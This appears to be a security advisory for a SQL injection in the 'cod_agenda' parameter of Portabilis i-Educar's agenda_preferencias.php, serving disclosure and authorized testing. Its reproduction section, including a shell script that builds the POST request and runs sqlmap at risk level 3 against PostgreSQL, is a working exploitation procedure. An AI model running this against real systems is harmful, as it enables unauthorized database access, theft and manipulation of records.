Portabilis i-Educar SQL Injection Vulnerability in agenda_preferencias.php

Vulnerability

A SQL injection vulnerability has been identified in the Portabilis i-Educar application, affecting versions up to 2.10. The flaw is in the 'agenda_preferencias.php' file, in the handling of the 'cod_agenda' parameter: the supplied value reaches a database query without proper validation or sanitization, so a remote attacker who controls the parameter can inject crafted SQL and execute arbitrary commands against the backend database. Possible consequences include unauthorized data access, database enumeration, data manipulation, denial of service through time-based delays, and, depending on the database configuration, privilege escalation or remote code execution.

Impact

Exploitation could expose sensitive data such as credentials, personal information, and application configuration details; allow database enumeration and manipulation, including inserting, updating, or deleting records; and disrupt application availability by using time-based SQL injection as a denial-of-service vector. Depending on the database functions available and the application context, it could also lead to privilege escalation or remote code execution.

Reproduction

To reproduce this vulnerability, send a POST request to the 'intranet/agenda_preferencias.php' endpoint with a body of content type 'application/x-www-form-urlencoded' that includes the 'cod_agenda' parameter set to a value that will trigger the injection. Save the request and pass it to a tool such as sqlmap to automate exploitation, instructing it to target the 'cod_agenda' parameter with risk level 3 and verbosity level 5, and specifying PostgreSQL as the database management system.
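As an added example (not code from this advisory or from the i-Educar project), the following POSIX shell script assembles the request described above into a raw HTTP request file suitable for 'sqlmap -r' and prints the matching sqlmap invocation with the parameter, risk, verbosity and DBMS options the reproduction steps name. The host name, the session cookie (the intranet pages are assumed to require an authenticated session), the benign starting value '1' for 'cod_agenda', and the '--batch' flag are assumptions not stated on the page; the script only runs sqlmap when RUN_SQLMAP=1 is set.

```shell
#!/bin/sh
# Added example: builds a raw request file for sqlmap and prints the
# sqlmap command line from the advisory's reproduction steps.
# Assumptions (not stated in the advisory): target host, an authenticated
# PHPSESSID cookie, the benign starting value 1 for cod_agenda, --batch.

TARGET_HOST="${TARGET_HOST:-ieducar.example.test}"          # assumption
SESSION_COOKIE="${SESSION_COOKIE:-PHPSESSID=replace-with-a-valid-session}"  # assumption
REQ_FILE="${REQ_FILE:-${TMPDIR:-/tmp}/agenda_preferencias.req}"

# Emit the raw POST request on stdout. Content-Length is computed from the
# body rather than hard-coded; a wrong length makes the server (and sqlmap)
# read a truncated or padded body and the test becomes meaningless.
build_request() {
    body="cod_agenda=1"   # benign value; sqlmap appends its own payloads to it
    len=$(printf '%s' "$body" | wc -c | tr -d ' ')
    printf 'POST /intranet/agenda_preferencias.php HTTP/1.1\r\n'
    printf 'Host: %s\r\n' "$TARGET_HOST"
    printf 'Cookie: %s\r\n' "$SESSION_COOKIE"
    printf 'Content-Type: application/x-www-form-urlencoded\r\n'
    printf 'Content-Length: %s\r\n' "$len"
    printf '\r\n'
    printf '%s' "$body"   # no trailing newline: the body must match Content-Length
}

# The sqlmap invocation from the reproduction steps: target only cod_agenda,
# risk level 3, verbosity 5, PostgreSQL backend. --batch (assumed here)
# accepts sqlmap's default answers so the run needs no interaction.
sqlmap_command() {
    printf 'sqlmap -r %s -p cod_agenda --risk=3 -v 5 --dbms=PostgreSQL --batch' "$1"
}

main() {
    build_request > "$REQ_FILE"
    echo "wrote raw request to $REQ_FILE:"
    cat "$REQ_FILE"
    echo
    echo "sqlmap command:"
    sqlmap_command "$REQ_FILE"
    echo
    # Only run sqlmap when explicitly asked, and only against a host you own
    # or are authorized to test.
    if [ "${RUN_SQLMAP:-0}" = "1" ] && command -v sqlmap >/dev/null 2>&1; then
        eval "$(sqlmap_command "$REQ_FILE")"
    fi
}

main "$@"
```

Run it with TARGET_HOST and SESSION_COOKIE set for the instance under test; inspect the generated file before setting RUN_SQLMAP=1, since the cookie and host are the two values most often wrong in a saved request.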

Added: Aug 29, 2025, 3:19 AM
Updated: Aug 29, 2025, 3:19 AM

Vulnerability Rating

Custom Algorithm
spread: 1.9
impact: 5.6
exploitability: 9.5
remediation: 0.0
relevance: 0.4
threat: 6.4
urgency: 2.9
incentive: 10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.